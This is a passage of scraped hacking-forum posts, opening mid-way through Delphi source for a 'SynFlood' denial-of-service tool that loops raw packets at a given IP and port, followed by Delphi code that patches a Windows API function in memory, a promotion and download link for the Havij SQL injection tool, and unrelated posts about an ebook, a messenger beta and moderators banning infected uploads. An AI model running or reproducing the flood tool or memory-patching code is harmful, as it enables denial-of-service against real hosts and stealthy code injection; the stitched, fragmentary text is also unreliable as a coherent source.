ErrorCode:=sendto(sock, buf, datasize, 0, Remote, sizeof(Remote)); if ErrorCode=SOCKET_ERROR then exit; write('.'); end; //end for writeln(''); end; //end while closesocket(sock); WSACleanup(); end; procedure Usage; begin WriteLn('SynFlood 0.1 for 2000/XP/2003'); WriteLn('http://www.wrsky.com'); WriteLn('hnxyy@hotmail.com'); WriteLn('QQ:19026695'); WriteLn; WriteLn('Usage: SynFlood -h:IP -p:port'); end; procedure ParseOption(Cmd, Arg: string); begin if arg='' then begin Usage; Halt(0); end; if lstrcmp('-h:', pchar(LowerCase(Cmd))) = 0 then begin clientpa^.IP :=arg; end else if lstrcmp('-p:', pchar(LowerCase(Cmd))) = 0 then begin clientpa^.Port :=StrToInt(Arg); end else begin Usage; Halt(0); end; end; procedure ProcessCommandLine; var CmdLn: integer; begin CmdLn := 1; if (ParamCount<2) or (ParamCount>2) then begin Usage; Halt(0); end; new(clientpa); while Length(ParamStr(CmdLn)) <> 0 do begin ParseOption(Copy(ParamStr(CmdLn), 1, 3), Copy(ParamStr(CmdLn), 4, Length(ParamStr(CmdLn)) - 2)); Inc(CmdLn); end; end; var ThreadID:DWord; begin ProcessCommandLine; CreateThread(nil, 0, @SynFloodThreadProc, clientpa, 0, ThreadID); while True do Sleep(1); end.
  15. [snippet] API Spoofing

      Author: carbon (I think)

          procedure CopyMemory(Destination, Source:Pointer; dwSize:DWORD);
          asm
            PUSH ECX
            PUSH ESI
            PUSH EDI
            MOV EDI, Destination
            MOV ESI, Source
            MOV ECX, dwSize
            REP MOVSB
            POP EDI
            POP ESI
            POP ECX
          end;

          var
            pMsgBoxA: Pointer;
            pOther: Pointer;
            pCode: Pointer;
            dwNull: Pointer;
            dwRelative: DWORD;
            xMessageBoxA: function(hWindow:HWND; lpText:PChar; lpCaption:PChar; uStyle:UINT):UINT; stdcall;
          begin
            pMsgBoxA := GetProcAddress(LoadLibraryA('user32.dll'), 'MessageBoxA');
            pOther := GetProcAddress(LoadLibraryA('user32.dll'), 'GetTopWindow');
            pCode := VirtualAlloc(nil, 10, MEM_COMMIT, PAGE_READWRITE);
            if ((Assigned(pMsgBoxA)) and (Assigned(pOther)) and (Assigned(pCode))) then
            begin
              PByte(pCode)^ := $55;               // PUSH EBP
              PByte(DWORD(pCode) + 1)^ := $8B;    // MOV EBP >>
              PByte(DWORD(pCode) + 2)^ := $EC;    // , ESP
              dwRelative := DWORD(pMsgBoxA) - DWORD(pOther);
              PByte(DWORD(pCode) + 3)^ := $E9;    // JMP
              PDWORD(DWORD(pCode) + 4)^ := dwRelative - 3; // user32.MessageBoxA
              // - 3 because the JMP is @ + 3
              VirtualProtect(pOther, 10, PAGE_EXECUTE_READWRITE, @dwNull);
              CopyMemory(pOther, pCode, 10);
              VirtualFree(pCode, 0, MEM_RELEASE);
              xMessageBoxA := Pointer(@GetTopWindow);
              xMessageBoxA(0, 'Spoofed API', 'TEST', 0);
            end;
          end.
  16. Moving to Microsoft Visual Studio 2010

      Developers, we’re pleased to announce another free offering: Moving to Microsoft Visual Studio 2010 (Microsoft Press, 2011; 336 pages), written by Patrice Pelland, Pascal Paré, and Ken Haines.

      Here’s a little bit about the authors:

      Ken Haines is a software development engineer at Microsoft, working in the Consumer and Online Division. He has a passion for distributed applications in the cloud and strives to help customers and partners find the right solution for their needs.

      Pascal Paré has worked at Microsoft since 2006, where he has held positions as a software engineer on both development and testing teams.

      Patrice Pelland is a principal development manager at Microsoft, working in the Consumer and Online Division. He leads a development team that is focused on innovation and incubation across all Microsoft consumer products.

      Moving to Microsoft Visual Studio 2010 was written with three audiences in mind: Part I is for developers moving from Visual Studio 2003 to Visual Studio 2010. Part II is for developers moving from Visual Studio 2005. And Part III is for developers moving from Visual Studio 2008.

      Please see this post for an extensive description of the book’s content, including “Who Is This Book for?,” “What Is the Book About?,” and “How Will This Book Help Me Move to Visual Studio 2010?” (Note that the links in that post are to a draft preview version of the book. Links to the final and complete book appear immediately below in this post.)

      Download:
      http://download.microsoft.com/download/9/0/B/90B96800-6765-4AC2-A79F-A2E9116F2157/Moving%20to%20Microsoft%20Visual%20Studio%202010%20ebook.pdf
      http://download.microsoft.com/download/9/0/B/90B96800-6765-4AC2-A79F-A2E9116F2157/Moving%20to%20Microsoft%20Visual%20Studio%202010%20ebook.xps

      Book's sample code:
      http://download.microsoft.com/download/9/0/B/90B96800-6765-4AC2-A79F-A2E9116F2157/Moving%20to%20Microsoft%20Visual%20Studio%202010%20sample%20code.zip

      Source: http://blogs.msdn.com/b/microsoft_press/archive/2010/09/13/free-ebook-moving-to-microsoft-visual-studio-2010.aspx
  17. Quick guide to SQL Injection attacks and defenses

      Authors: ITSecTeam

      Part of the article:

      A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application.

      ....................................................................

      Download: http://itsecteam.com/files/Quick%20guide%20to%20SQL%20Injection%20attacks%20and%20defenses%20-%20english.pdf
  18. I've seen that there are many fans of this program. This version came out recently.

      Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

      The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

      Havij v1.13 Advanced SQL Injection Tool released. New features of this version are:

      * Oracle error based database added with ability to execute query.
      * Getting tables and column when database name is unknown added (mysql)
      * Another method added for finding columns count and string column in PostgreSQL
      * Automatic keyword finder optimized and some bugs fixed.
      * A bug in finding valid string column in mysql fixed.
      * 'Key is not unique' bug fixed
      * Getting data starts from row 2 when All in One fails - bug fixed
      * Run time error when finding keyword fixed.
      * False table finding in access fixed.
      * keyword correction method made better
      * A bug in getting current data base in mssql fixed.
      * A secondary method added when input value doesn't return a normal page (usually 404 not found)
      * Data extraction bug in html-encoded pages fixed.
      * String or integer type detection made better.
      * A bug in https injection fixed.

      How to use

      This tool is for exploiting SQL Injection bugs in web application. For using this tool you should know a little about SQL Injections. Enter target url and select http method then click Analyze. Note: Try to url be valid input that returns a normal page not a 404 or error page.

      Info: http://itsecteam.com/en/projects/project1.htm
      Download: http://itsecteam.com/files/havij/Havij1.13Free.rar

      PS: I haven't tried it and I don't know whether it's infected, but if you get it from the official site, from the link posted, I don't think there will be problems.
  19. I think it came out recently, if not today. Details: http://www.ymessengerblog.com/blog/2010/11/16/introducing-the-new-yahoo-messenger-beta/ I think the biggest new feature is the integration of the Facebook and Twitter services. I haven't tried it; I'm on Linux, so I can't give too many details. You can download it from here: http://messenger.yahoo.com/beta/win
  20. The one by Stephen King, right? I've read it, I liked some of the ideas, it's interesting.
  21. TinKode: I'd really be glad if you worked at Google or another renowned company in this field; I know that's what you want. But it's not quite like that. Pentesting means networking, very good programming knowledge (C, ASM -> BOFs) and much more.
  22. "One thing I want people to know about me: I don't consider myself a hacker. I've noticed that many kids think of themselves that way (they use programs made by others to be able to break into other sites, without even knowing how those applications work; these, in short, are called "script-kiddies")" +1 Kabron: He didn't lie. Anyway, I think he's getting his hopes up for nothing that someone will hire him; such things aren't really in demand. If he had focused on networking or cryptography, it would have been a different story.
  23. I think the data was going to end up at: lx.8@hotmail.com. Anyway, it was infected; permanent ban, moved to the trash.
  24. Tested TV-MAXE on Mandriva, it works perfectly, my congratulations to the author.
  25. I didn't even need to read what this topic contains to realize that its place is in the Trash. I didn't download what you posted, but the title says it all. Permanent ban.